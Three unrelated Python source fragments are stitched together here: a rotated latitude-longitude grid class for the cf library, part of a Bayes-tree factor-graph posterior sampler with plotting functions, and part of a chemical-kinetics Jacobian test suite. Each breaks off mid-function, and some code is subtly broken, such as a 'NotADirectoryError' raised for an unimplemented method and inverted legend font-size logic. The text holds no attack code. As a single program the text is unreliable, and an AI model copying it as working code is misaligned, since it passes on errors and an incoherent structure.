shape {Y, X}: (5, 4)
Y, grid_latitude (5,): [-0.88, ..., 0.88] degrees
X, grid_longitude (4,): [-2.5, ..., -1.18] degrees
Y_bounds (5, 2): [[-1.1, ..., 1.1]] degrees
X_bounds (4, 2): [[-2.72, ..., -0.96]] degrees
)
"""
inst = cls(
**cls._get_grid_from_extent_and_resolution(
grid_latitude_extent, grid_longitude_extent,
grid_latitude_resolution, grid_longitude_resolution,
grid_latitude_grid_longitude_location,
# altitude_extent, altitude_resolution, altitude_location
),
grid_north_pole_latitude=grid_north_pole_latitude,
grid_north_pole_longitude=grid_north_pole_longitude,
north_pole_grid_longitude=north_pole_grid_longitude
)
inst._extent = {
# 'Z': altitude_extent,
'Y': grid_latitude_extent,
'X': grid_longitude_extent
}
inst._resolution = {
# 'Z': altitude_resolution,
'Y': grid_latitude_resolution,
'X': grid_longitude_resolution
}
inst._location = {
# 'Z': altitude_location,
'YX': grid_latitude_grid_longitude_location
}
return inst
@classmethod
def from_field(cls, field):
"""Instantiate a `RotatedLatLonGrid` from spatial dimension
coordinates of a `cf.Field`.
:Parameters:
field: `cf.Field`
The field object that will be used to instantiate a
`RotatedLatLonGrid` instance. This field must feature a
'grid_latitude' and a 'grid_longitude' dimension
coordinates, and these must feature bounds. In addition,
the parameters required for the conversion of the grid
to a true latitude-longitude reference system must be set
(i.e. grid_north_pole_latitude, grid_north_pole_longitude,
and optional north_pole_grid_longitude).
..
This field may optionally feature an 'altitude'
dimension coordinate alongside its bounds (both
required otherwise ignored).
:Returns: `RotatedLatLonGrid`
**Examples**
Instantiating from a 2D field:
>>> import cf
>>> f = cf.Field()
>>> lat = f.set_construct(
... cf.DimensionCoordinate(
... properties={'standard_name': 'grid_latitude',
... 'units': 'degrees',
... 'axis': 'Y'},
... data=cf.Data([-0.88, -0.44, 0., 0.44, 0.88]),
... bounds=cf.Bounds(data=cf.Data([[-1.1, -0.66], [-0.66, -0.22],
... [-0.22, 0.22], [0.22, 0.66],
... [0.66, 1.1]]))
... ),
... axes=f.set_construct(cf.DomainAxis(size=5))
... )
>>> lon = f.set_construct(
... cf.DimensionCoordinate(
... properties={'standard_name': 'grid_longitude',
... 'units': 'degrees',
... 'axis': 'X'},
... data=cf.Data([-2.5, -2.06, -1.62, -1.18]),
... bounds=cf.Bounds(data=cf.Data([[-2.72, -2.28], [-2.28, -1.84],
... [-1.84, -1.4], [-1.4, -0.96]]))
... ),
... axes=f.set_construct(cf.DomainAxis(size=4))
... )
>>> crs = f.set_construct(
... cf.CoordinateReference(
... coordinate_conversion=cf.CoordinateConversion(
... parameters={'grid_mapping_name': 'rotated_latitude_longitude',
... 'grid_north_pole_latitude': 38.0,
... 'grid_north_pole_longitude': 190.0}),
... coordinates=(lat, lon)
... )
... )
>>> sd = RotatedLatLonGrid.from_field(f)
>>> print(sd)
RotatedLatLonGrid(
shape {Y, X}: (5, 4)
Y, grid_latitude (5,): [-0.88, ..., 0.88] degrees
X, grid_longitude (4,): [-2.5, ..., -1.18] degrees
Y_bounds (5, 2): [[-1.1, ..., 1.1]] degrees
X_bounds (4, 2): [[-2.72, ..., -0.96]] degrees
)
Using the field interface back and forth:
>>> sd1 = RotatedLatLonGrid.from_extent_and_resolution(
... grid_latitude_extent=(-1.1, 1.1),
... grid_longitude_extent=(-2.72, -0.96),
... grid_latitude_resolution=0.44,
... grid_longitude_resolution=0.44,
... grid_north_pole_latitude=38.0,
... grid_north_pole_longitude=190.0
... )
>>> sd2 = RotatedLatLonGrid.from_field(sd1.to_field())
>>> sd2 == sd1
True
.. Instantiating from a 3D field:
..
.. >>> import cf
.. >>> f = cf.Field()
.. >>> lat = f.set_construct(
.. ... cf.DimensionCoordinate(
.. ... properties={'standard_name': 'grid_latitude',
.. ... 'units': 'degrees',
.. ... 'axis': 'Y'},
.. ... data=cf.Data([-0.88, -0.44, 0., 0.44, 0.88]),
.. ... bounds=cf.Bounds(data=cf.Data([[-1.1, -0.66], [-0.66, -0.22],
.. ... [-0.22, 0.22], [0.22, 0.66],
.. ... [0.66, 1.1]]))
.. ... ),
.. ... axes=f.set_construct(cf.DomainAxis(size=5))
.. ... )
.. >>> lon = f.set_construct(
.. ... cf.DimensionCoordinate(
.. ... properties={'standard_name': 'grid_longitude',
.. ... 'units': 'degrees',
.. ... 'axis': 'X'},
.. ... data=cf.Data([-2.5, -2.06, -1.62, -1.18]),
.. ... bounds=cf.Bounds(data=cf.Data([[-2.72, -2.28], [-2.28, -1.84],
.. ... [-1.84, -1.4], [-1.4, -0.96]]))
.. ... ),
.. ... axes=f.set_construct(cf.DomainAxis(size=4))
.. ... )
.. >>> alt = f.set_construct(
.. ... cf.DimensionCoordinate(
.. ... properties={'standard_name': 'altitude',
.. ... 'units': 'm',
.. ... 'axis': 'Z'},
.. ... data=cf.Data([10]),
.. ... bounds=cf.Bounds(data=cf.Data([[0, 20]]))
.. ... ),
.. ... axes=f.set_construct(cf.DomainAxis(size=1))
.. ... )
.. >>> crs = f.set_construct(
.. ... cf.CoordinateReference(
.. ... coordinate_conversion=cf.CoordinateConversion(
.. ... parameters={'grid_mapping_name': 'rotated_latitude_longitude',
.. ... 'grid_north_pole_latitude': 38.0,
.. ... 'grid_north_pole_longitude': 190.0}),
.. ... coordinates=(lat, lon)
.. ... )
.. ... )
.. >>> sd = RotatedLatLonGrid.from_field(f)
.. >>> print(sd)
.. RotatedLatLonGrid(
.. shape {Y, X}: (1, 5, 4)
.. Y, grid_latitude (5,): [-0.88, ..., 0.88] degrees
.. X, grid_longitude (4,): [-2.5, ..., -1.18] degrees
.. Z_bounds (1, 2): [[0, 20]] m
.. Y_bounds (5, 2): [[-1.1, ..., 1.1]] degrees
.. X_bounds (4, 2): [[-2.72, ..., -0.96]] degrees
.. )
"""
extraction_xyz = cls._extract_xyz_from_field(field)
extraction_param = cls._extract_crs_rotation_parameters_from_field(field)
return cls(grid_latitude=extraction_xyz['Y'],
grid_longitude=extraction_xyz['X'],
grid_latitude_bounds=extraction_xyz['Y_bounds'],
grid_longitude_bounds=extraction_xyz['X_bounds'],
# altitude=extraction_xyz['Z'],
# altitude_bounds=extraction_xyz['Z_bounds'],
**extraction_param)
def to_config(self):
cfg = super(RotatedLatLonGrid, self).to_config()
cfg.update(
self._extract_crs_rotation_parameters_from_field(self._f)
)
return cfg
@property
def coordinate_reference(self):
"""Return the coordinate reference of the RotatedLatLonGrid
instance as a `cf.CoordinateReference` instance.
"""
return self._f.coordinate_reference(
'grid_mapping_name:rotated_latitude_longitude'
)
@classmethod
def _extract_crs_rotation_parameters_from_field(cls, field):
# check conversion parameters
if field.coordinate_reference(
'grid_mapping_name:rotated_latitude_longitude',
default=False
):
crs = field.coordinate_reference(
'grid_mapping_name:rotated_latitude_longitude'
)
else:
raise RuntimeError(
f"{cls.__name__} field missing coordinate conversion "
f"'grid_mapping_name:rotated_latitude_longitude"
)
if crs.coordinate_conversion.has_parameter('grid_north_pole_latitude'):
grid_north_pole_lat = crs.coordinate_conversion.get_parameter(
'grid_north_pole_latitude')
else:
raise RuntimeError(
f"{cls.__name__} field coordinate conversion missing "
f"property 'grid_north_pole_latitude'"
)
if crs.coordinate_conversion.has_parameter('grid_north_pole_longitude'):
grid_north_pole_lon = crs.coordinate_conversion.get_parameter(
'grid_north_pole_longitude')
else:
raise RuntimeError(
f"{cls.__name__} field coordinate conversion missing "
f"property 'grid_north_pole_longitude'"
)
if crs.coordinate_conversion.has_parameter('north_pole_grid_longitude'):
north_pole_grid_lon = crs.coordinate_conversion.get_parameter(
'north_pole_grid_longitude')
else:
north_pole_grid_lon = 0.
return {
'grid_north_pole_latitude': grid_north_pole_lat,
'grid_north_pole_longitude': grid_north_pole_lon,
'north_pole_grid_longitude': north_pole_grid_lon
}
def _set_crs_parameters(self, grid_north_pole_latitude,
grid_north_pole_longitude,
north_pole_grid_longitude):
# WGS84
coord_conversion = cf.CoordinateConversion(
parameters={'grid_mapping_name': 'latitude_longitude',
'unit_conversion_factor': 0.0174532925199433})
datum = cf.Datum(
parameters={'geographic_crs_name': 'WGS 84',
'horizontal_datum_name': 'WGS_1984',
'semi_major_axis': 6378137.0,
'inverse_flattening': 298.257223563,
'longitude_of_prime_meridian': 0.0}
)
self._f.set_construct(
cf.CoordinateReference(
datum=datum,
coordinate_conversion=coord_conversion,
coordinates=[self._f.dim(self._Y_name, key=True),
self._f.dim(self._X_name, key=True),
self._f.aux('latitude', key=True),
self._f.aux('longitude', key=True)]
)
)
# Rotated Grid
coord_conversion = cf.CoordinateConversion(
parameters={'grid_mapping_name': 'rotated_latitude_longitude',
'unit_conversion_factor': 0.0174532925199433,
'grid_north_pole_latitude':
grid_north_pole_latitude,
'grid_north_pole_longitude':
grid_north_pole_longitude,
'north_pole_grid_longitude':
north_pole_grid_longitude}
)
datum = cf.Datum(
parameters={'horizontal_datum_name': 'WGS_1984',
'semi_major_axis': 6378137.0,
'inverse_flattening': 298.257223563,
'longitude_of_prime_meridian': 0.0}
)
self._f.set_construct(
cf.CoordinateReference(
datum=datum,
coordinate_conversion=coord_conversion,
coordinates=[self._f.dim(self._Y_name, key=True),
self._f.dim(self._X_name, key=True),
self._f.aux('latitude', key=True),
self._f.aux('longitude', key=True)]
)
)
def _check_crs_rotation_parameters(self, coord_ref):
if hasattr(coord_ref, 'coordinate_conversion'):
# eliminate 'unit'/'units' parameter as it is not standardised in
# the CF convention, and the split of the coordinate reference into
# coordinate conversion/datum is a CF data model artifact | |
and separator vars,
recycle the density model in the old clique and convert it to that in the new clique.
"""
raise NotImplementedError("Implementation depends on probabilistic modeling")
def clique_density_to_separator_factor(self,
separator_var_list: List[Variable],
density_model,
true_obs: np.ndarray) -> CliqueSeparatorFactor:
"""
extract marginal of separator variables from clique density as separator factor
"""
raise NotImplementedError("Implementation depends on probabilistic modeling")
def incremental_inference(self,
timer: List[float] = None,
clique_dim_timer: List[List[float]] = None,
*args, **kwargs
):
self.fit_tree_density_models(timer=timer,
clique_dim_timer=clique_dim_timer,
*args, **kwargs)
if self._args.adaptive_posterior_sampling is None:
self._samples = self.sample_posterior(timer=timer, *args, **kwargs)
else:
self._samples = self.adaptive_posterior(timer=timer, *args, **kwargs)
return self._samples
def fit_clique_density_model(self,
clique,
samples,
var_ordering,
timer,
*args, **kwargs) -> "ConditionalSampler":
raise NotImplementedError("Implementation depends on probabilistic modeling.")
def adaptive_posterior(self, timer: List[float] = None, *args, **kwargs
) -> Dict[Variable, np.ndarray]:
"""
Generate samples for all variables
"""
raise NotADirectoryError("implementation depends on density models.")
def fit_tree_density_models(self,
timer: List[float] = None,
clique_dim_timer: List[List[float]] = None,
*args, **kwargs):
"""
By the order of Bayes tree, perform local sampling and training
on all cliques
:return:
"""
self._temp_training_loss = {}
clique_ordering = self._working_bayes_tree.clique_ordering()
total_clique_num = len(clique_ordering)
clique_cnt = 1
before_clique_time = time.time()
while clique_ordering:
start_clique_time = time.time()
clique = clique_ordering.pop()
if clique in self._clique_density_model:
end_clique_time = time.time()
print(f"\tTime for clique {clique_cnt}/{total_clique_num}: " + str(
end_clique_time - start_clique_time) + " sec, "
"total time elapsed: " + str(
end_clique_time - before_clique_time) + " sec")
clique_cnt += 1
if (clique_dim_timer is not None):
clique_dim_timer.append([clique.dim, end_clique_time - before_clique_time])
continue
# local sampling
sampler_start = time.time()
local_samples, sample_var_ordering, true_obs = \
self.clique_training_sampler(clique,
num_samples=self._args.local_sample_num,
method=self._args.local_sampling_method)
sampler_end = time.time()
if timer is not None:
timer.append(sampler_end - sampler_start)
self._clique_true_obs[clique] = true_obs
if self._args.store_clique_samples:
self._clique_samples[clique] = local_samples
local_density_model = \
self.fit_clique_density_model(clique=clique,
samples=local_samples,
var_ordering=sample_var_ordering,
timer=timer)
self._clique_density_model[clique] = local_density_model
new_separator_factor = None
if clique.separator:
# extract new factor over separator
separator_list = sorted(clique.separator,
key=lambda x:
self._reverse_ordering_map[x])
new_separator_factor = self.clique_density_to_separator_factor(separator_list,
local_density_model,
true_obs)
self._implicit_factors[clique] = new_separator_factor
self._working_graph = self._working_graph.eliminate_clique_variables(clique=clique,
new_factor=new_separator_factor)
end_clique_time = time.time()
print(f"\tTime for clique {clique_cnt}/{total_clique_num}: " + str(
end_clique_time - start_clique_time) + " sec, "
"total time elapsed: " + str(
end_clique_time - before_clique_time) + " sec" + ", clique_dim is " + str(clique.dim))
if (clique_dim_timer is not None):
clique_dim_timer.append([clique.dim, end_clique_time - before_clique_time])
clique_cnt += 1
def clique_training_sampler(self, clique: BayesTreeNode, num_samples: int, method: str):
r""" This function returns training samples, simulated variables, and unused observations
"""
graph = self._working_graph.get_clique_factor_graph(clique)
variable_pattern = \
self._working_bayes_tree.clique_variable_pattern(clique)
if method == "direct":
sampler = SimulationBasedSampler(factors=graph.factors, vars=variable_pattern)
samples, var_list, unused_obs = sampler.sample(num_samples)
elif method == "nested" or method == "dynamic nested":
ns_sampler = GlobalNestedSampler(nodes=variable_pattern, factors=graph.factors)
samples = ns_sampler.sample(live_points=num_samples, sampling_method=method)
var_list = variable_pattern
unused_obs = np.array([])
else:
raise ValueError("Unknown sampling method.")
return samples, var_list, unused_obs
def sample_posterior(self, timer: List[float] = None, *args, **kwargs
) -> Dict[Variable, np.ndarray]:
"""
Generate samples for all variables
"""
num_samples = self._args.posterior_sample_num
start = time.time()
stack = [self._physical_bayes_tree.root]
samples = {}
while stack:
# Retrieve the working clique
clique = stack.pop()
# Local sampling
frontal_list = sorted(clique.frontal,
key=lambda x: self._reverse_ordering_map[x])
separator_list = sorted(clique.separator,
key=lambda x: self._reverse_ordering_map[x])
clique_density_model = self._clique_density_model[clique]
obs = self._clique_true_obs[clique]
aug_separator_samples = np.zeros(shape=(num_samples, 0))
if len(obs) != 0:
aug_separator_samples = np.tile(obs, (num_samples, 1))
for var in separator_list:
aug_separator_samples = np.hstack((aug_separator_samples,
samples[var]))
if aug_separator_samples.shape[1] != 0:
frontal_samples = clique_density_model. \
conditional_sample_given_observation(conditional_dim=clique.frontal_dim,
obs_samples=aug_separator_samples)
else: # the root clique
frontal_samples = clique_density_model. \
conditional_sample_given_observation(conditional_dim=clique.frontal_dim,
sample_number=num_samples)
# Dispatch samples
cur_index = 0
for var in frontal_list:
samples[var] = frontal_samples[:,
cur_index: cur_index + var.dim]
cur_index += var.dim
if clique.children:
for child in clique.children:
stack.append(child)
end = time.time()
if timer is not None:
timer.append(end - start)
return samples
def plot2d_posterior(self, title: str = None, xlim=None, ylim=None,
marker_size: float = 1, if_legend: bool = False):
# xlim and ylim are tuples
vars = self._elimination_ordering
# list(self._samples.keys())
len_var = len(vars)
for i in range(len_var):
cur_sample = self._samples[vars[i]]
plt.scatter(cur_sample[:, 0], cur_sample[:, 1], marker=".",
s=marker_size)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
if if_legend:
plt.legend([var.name for var in vars])
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
plt.title(title)
fig_handle = plt.gcf()
plt.show()
return fig_handle
def results(self):
return list(self._samples.values()), list(self._samples.keys())
def plot2d_mean_points(self, title: str = None, xlim=None, ylim=None,
if_legend: bool = False):
# xlim and ylim are tuples
vars = self._elimination_ordering
# list(self._samples.keys())
len_var = len(vars)
x_list = []
y_list = []
for i in range(len_var):
cur_sample = self._samples[vars[i]]
x = np.mean(cur_sample[:, 0])
y = np.mean(cur_sample[:, 1])
x_list.append(x)
y_list.append(y)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.plot(x_list, y_list)
if if_legend:
plt.legend([var.name for var in vars])
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
plt.title(title)
fig_handle = plt.gcf()
plt.show()
return fig_handle
def plot2d_mean_rbt_only(self, title: str = None, xlim=None, ylim=None,
if_legend: bool = False, fname=None, front_size=None, show_plot=False, **kwargs):
# xlim and ylim are tuples
vars = self._elimination_ordering
# list(self._samples.keys())
len_var = len(vars)
x_list = []
y_list = []
lmk_list = []
for i in range(len_var):
if vars[i]._type == VariableType.Landmark:
lmk_list.append(vars[i])
else:
cur_sample = self._samples[vars[i]]
x = np.mean(cur_sample[:, 0])
y = np.mean(cur_sample[:, 1])
x_list.append(x)
y_list.append(y)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.plot(x_list, y_list)
for var in lmk_list:
cur_sample = self._samples[var]
plt.scatter(cur_sample[:, 0], cur_sample[:, 1], label=var.name)
if if_legend:
if front_size is not None:
plt.legend()
else:
plt.legend(fontsize=front_size)
if front_size is not None:
plt.xlabel('x (m)', fontsize=front_size)
plt.ylabel('y (m)', fontsize=front_size)
else:
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
if front_size is not None:
plt.title(title, fontsize=front_size)
else:
plt.title(title)
fig_handle = plt.gcf()
if fname is not None:
plt.savefig(fname)
if show_plot:
plt.show()
return fig_handle
def plot2d_MAP_rbt_only(self, title: str = None, xlim=None, ylim=None,
if_legend: bool = False, fname=None, front_size=None):
# xlim and ylim are tuples
vars = self._elimination_ordering
jf = JointFactor(self.physical_factors, vars)
# list(self._samples.keys())
all_sample = sample_dict_to_array(self._samples, vars)
log_pdf = jf.log_pdf(all_sample)
max_idx = np.argmax(log_pdf)
map_sample = all_sample[max_idx:max_idx+1]
map_sample_dict = array_order_to_dict(map_sample, vars)
len_var = len(vars)
x_list = []
y_list = []
lmk_list = []
for i in range(len_var):
if vars[i]._type == VariableType.Landmark:
lmk_list.append(vars[i])
else:
cur_sample = map_sample_dict[vars[i]]
x = np.mean(cur_sample[:, 0])
y = np.mean(cur_sample[:, 1])
x_list.append(x)
y_list.append(y)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.plot(x_list, y_list)
for var in lmk_list:
cur_sample = map_sample_dict[var]
plt.scatter(cur_sample[:, 0], cur_sample[:, 1], label=var.name)
if if_legend:
if front_size is not None:
plt.legend()
else:
plt.legend(fontsize=front_size)
if front_size is not None:
plt.xlabel('x (m)', fontsize=front_size)
plt.ylabel('y (m)', fontsize=front_size)
else:
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
if front_size is not None:
plt.title(title, fontsize=front_size)
else:
plt.title(title)
fig_handle = plt.gcf()
if fname is not None:
plt.savefig(fname)
plt.show()
return fig_handle
def plot2d_mean_poses(self, title: str = None, xlim=None, ylim=None,
width: float = 0.05, if_legend: bool = False):
# xlim and ylim are tuples
vars = self._elimination_ordering
# list(self._samples.keys())
len_var = len(vars)
x_list = []
y_list = []
for i in range(len_var):
cur_sample = self._samples[vars[i]]
x = np.mean(cur_sample[:, 0])
y = np.mean(cur_sample[:, 1])
x_list.append(x)
y_list.append(y)
# th_mean = circmean(cur_sample[:,2])
# dx, dy = np.cos(th_mean), np.sin(th_mean)
# plt.arrow(x-dx/2, y-dy/2, dx, dy,
# head_width=4*width,
# width=0.05)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.plot(x_list, y_list)
if if_legend:
plt.legend([var.name for var in vars])
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
plt.title(title)
fig_handle = plt.gcf()
plt.show()
return fig_handle
def plot_factor_graph(self):
pass
def plot_bayes_tree(self):
pass
def run_incrementally(case_dir: str, solver: FactorGraphSolver, nodes_factors_by_step, truth=None, traj_plot=False,
plot_args=None, check_root_transform=False) -> None:
run_count = 1
while os.path.exists(f"{case_dir}/run{run_count}"):
run_count += 1
os.mkdir(f"{case_dir}/run{run_count}")
run_dir = f"{case_dir}/run{run_count}"
print("create run dir: " + run_dir)
file = open(f"{run_dir}/parameters", "w+")
params = solver._args.jsonStr()
print(params)
file.write(params)
file.close()
num_batches = len(nodes_factors_by_step)
observed_nodes = []
step_timer = []
step_list = []
posterior_sampling_timer = []
fitting_timer = []
mixture_factor2weights = {}
show_plot = True
if "show_plot" in plot_args and not plot_args["show_plot"]:
show_plot = False
for i in range(num_batches):
step_nodes, step_factors = nodes_factors_by_step[i]
for node in step_nodes:
solver.add_node(node)
for factor in step_factors:
solver.add_factor(factor)
if isinstance(factor, BinaryFactorMixture):
mixture_factor2weights[factor] = []
observed_nodes += step_nodes
step_list.append(i)
step_file_prefix = f"{run_dir}/step{i}"
detailed_timer = []
clique_dim_timer = []
start = time.time()
solver.update_physical_and_working_graphs(timer=detailed_timer)
cur_sample = solver.incremental_inference(timer=detailed_timer, clique_dim_timer=clique_dim_timer)
end = time.time()
step_timer.append(end - start)
print(f"step {i}/{num_batches} time: {step_timer[-1]} sec, "
| |
args and parameters
phi = self.store.phi_cp if conp else self.store.phi_cv
args = {'phi': lambda x: np.array(phi, order=x, copy=True),
'kf': lambda x: np.zeros_like(self.store.fwd_rate_constants,
order=x)}
opts = loopy_options(order='C', lang='c')
namestore = arc.NameStore(opts, rate_info, True, self.store.test_size)
# get kf
runner = kernel_runner(get_simple_arrhenius_rates,
self.store.test_size, args)
kf = runner(opts, namestore, self.store.test_size)['kf']
if self.store.ref_Pr.size:
args = {'phi': lambda x: np.array(phi, order=x, copy=True),
'kf_fall': lambda x: np.zeros_like(self.store.ref_Fall, order=x)}
# get kf_fall
runner = kernel_runner(get_simple_arrhenius_rates,
self.store.test_size, args,
{'falloff': True})
kf_fall = runner(opts, namestore, self.store.test_size)['kf_fall']
else:
kf_fall = None
if namestore.num_plog is not None:
args = {'phi': lambda x: np.array(phi, order=x, copy=True),
'kf': lambda x: np.array(kf, order=x, copy=True)}
if conp:
args['P_arr'] = lambda x: np.array(
self.store.P, order=x, copy=True)
# get plog
runner = kernel_runner(_get_plog_call_wrapper(rate_info),
self.store.test_size, args)
kf = runner(opts, namestore, self.store.test_size)['kf']
if namestore.num_cheb is not None:
args = {'phi': lambda x: np.array(phi, order=x, copy=True),
'kf': lambda x: np.array(kf, order=x, copy=True)}
if conp:
args['P_arr'] = lambda x: np.array(
self.store.P, order=x, copy=True)
# get plog
runner = kernel_runner(_get_cheb_call_wrapper(rate_info),
self.store.test_size, args)
kf = runner(opts, namestore, self.store.test_size)['kf']
return kf, kf_fall
def __get_kr(self, kf):
reacs = self.store.reacs
specs = self.store.specs
rate_info = determine_jac_inds(reacs, specs, RateSpecialization.fixed)
args = {
'kf': lambda x: np.array(kf, order=x, copy=True),
'b': lambda x: np.array(
self.store.ref_B_rev, order=x, copy=True)}
opts = loopy_options(order='C', lang='c')
namestore = arc.NameStore(opts, rate_info, True, self.store.test_size)
allint = {'net': rate_info['net']['allint']}
# get kf
runner = kernel_runner(get_rev_rates,
self.store.test_size, args, {'allint': allint})
kr = runner(opts, namestore, self.store.test_size)['kr']
return kr
def __get_db(self):
reacs = self.store.reacs
specs = self.store.specs
rate_info = determine_jac_inds(reacs, specs, RateSpecialization.fixed)
opts = loopy_options(order='C', lang='c')
namestore = arc.NameStore(opts, rate_info, True, self.store.test_size)
# need dBk/dT
args = {
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True),
}
def __call_wrapper(loopy_opts, namestore, test_size):
return thermo_temperature_derivative(
'db',
loopy_opts, namestore,
test_size)
# get db
runner = kernel_runner(__call_wrapper, self.store.test_size, args)
return runner(opts, namestore, self.store.test_size)['db']
@attr('long')
@with_check_inds(check_inds={
1: lambda self: self.__get_dci_check(
lambda rxn: isinstance(rxn, ct.FalloffReaction) and
rxn.falloff.type == 'Simple'),
2: lambda self: 2 + np.arange(self.store.gas.n_species - 1)
})
def test_dci_lind_dnj(self):
# test conp
namestore, rate_info = self._make_namestore(True)
ad_opts = namestore.loopy_opts
# set up arguements
allint = {'net': rate_info['net']['allint']}
fwd_removed, rev_removed = self.__get_removed()
# setup arguements
# create the editor
edit = editor(
namestore.n_arr, namestore.n_dot, self.store.test_size,
order=ad_opts.order, skip_on_missing=get_lind_kernel)
kf, kf_fall = self.__get_kf_and_fall()
args = {'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'pres_mod': lambda x: np.zeros_like(
self.store.ref_pres_mod, order=x),
'rop_net': lambda x: np.zeros_like(
self.store.rxn_rates, order=x),
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True),
'P_arr': lambda x: np.array(
self.store.P, order=x, copy=True),
'conc': lambda x: np.zeros_like(
self.store.concs, order=x),
'wdot': lambda x: np.zeros_like(
self.store.species_rates, order=x),
'thd_conc': lambda x: np.zeros_like(
self.store.ref_thd, order=x),
'Fi': lambda x: np.zeros_like(self.store.ref_Fall, order=x),
'Pr': lambda x: np.zeros_like(self.store.ref_Pr, order=x),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
}
# obtain the finite difference jacobian
kc = kernel_call('dci_lind_nj', [None], **args)
fd_jac = self._get_jacobian(
get_molar_rates, kc, edit, ad_opts, True,
extra_funcs=[get_concentrations, get_thd_body_concs,
get_reduced_pressure_kernel, get_lind_kernel,
get_rxn_pres_mod, get_rop_net,
get_spec_rates],
do_not_set=[namestore.conc_arr, namestore.spec_rates,
namestore.rop_net, namestore.Fi],
allint=allint)
# setup args
args = {
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'Fi': lambda x: np.array(
self.store.ref_Fall, order=x, copy=True),
'pres_mod': lambda x: np.array(
self.store.ref_pres_mod, order=x, copy=True),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
}
def _chainer(self, out_vals):
self.kernel_args['jac'] = out_vals[-1][0].copy(
order=self.current_order)
# and get mask
comp = self._get_compare(fd_jac)
kc = [kernel_call('dci_lind_dnj', comp.ref_answer, check=False,
strict_name_match=True, **args),
kernel_call('dci_lind_dnj_ns', comp.ref_answer, compare_mask=[comp],
compare_axis=comp.compare_axis, chain=_chainer,
strict_name_match=True, allow_skip=True, **args)]
return self._generic_jac_tester(dci_lind_dnj, kc)
def __get_sri_params(self, namestore):
sri_args = {'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True)}
runner = kernel_runner(get_sri_kernel, self.store.test_size, sri_args)
opts = loopy_options(order='C', lang='c')
X = runner(opts, namestore, self.store.test_size)['X']
return X
@attr('long')
@with_check_inds(check_inds={
# find non-NaN SRI entries for testing
# NaN entries will be handled by :func:`nan_compare`
0: lambda self: np.where(np.all(
self.store.ref_Pr[:, self.store.sri_to_pr_map] != 0.0, axis=1))[0],
1: lambda self: self.__get_dci_check(
lambda rxn: isinstance(rxn, ct.FalloffReaction) and
rxn.falloff.type == 'SRI'),
2: lambda self: 2 + np.arange(self.store.gas.n_species - 1)
})
def test_dci_sri_dnj(self):
# test conp
namestore, rate_info = self._make_namestore(True)
ad_opts = namestore.loopy_opts
# set up arguements
allint = {'net': rate_info['net']['allint']}
# get our form of rop_fwd / rop_rev
fwd_removed, rev_removed = self.__get_removed()
# setup arguements
# create the editor
edit = editor(
namestore.n_arr, namestore.n_dot, self.store.test_size,
order=ad_opts.order, skip_on_missing=get_sri_kernel)
if not rate_info['fall']['sri']['num']:
raise SkipTest('No SRI reactions in mechanism {}'.format(
self.store.gas.name))
# get kf / kf_fall
kf, kf_fall = self.__get_kf_and_fall()
# create X
X = self.__get_sri_params(namestore)
args = {
'pres_mod': lambda x: np.zeros_like(
self.store.ref_pres_mod, order=x),
'thd_conc': lambda x: np.array(
self.store.ref_thd, order=x, copy=True),
'Fi': lambda x: np.zeros_like(self.store.ref_Fall, order=x),
'Pr': lambda x: np.array(self.store.ref_Pr, order=x, copy=True),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
'X': lambda x: np.zeros_like(X, order=x),
'phi': lambda x: np.array(self.store.phi_cp, order=x, copy=True),
'P_arr': lambda x: np.array(self.store.P, order=x, copy=True),
'conc': lambda x: np.zeros_like(self.store.concs, order=x),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
'wdot': lambda x: np.zeros_like(self.store.species_rates, order=x),
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'rop_net': lambda x: np.zeros_like(self.store.rxn_rates, order=x)
}
# obtain the finite difference jacobian
kc = kernel_call('dci_sri_nj', [None], **args)
fd_jac = self._get_jacobian(
get_molar_rates, kc, edit, ad_opts, True,
extra_funcs=[get_concentrations, get_thd_body_concs,
get_reduced_pressure_kernel, get_sri_kernel,
get_rxn_pres_mod, get_rop_net, get_spec_rates],
do_not_set=[namestore.conc_arr, namestore.Fi, namestore.X_sri,
namestore.thd_conc],
allint=allint)
# setup args
args = {
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'Fi': lambda x: np.array(
self.store.ref_Fall, order=x, copy=True),
'pres_mod': lambda x: np.array(
self.store.ref_pres_mod, order=x, copy=True),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
'X': lambda x: np.array(X, order=x, copy=True),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True)
}
def _chainer(self, out_vals):
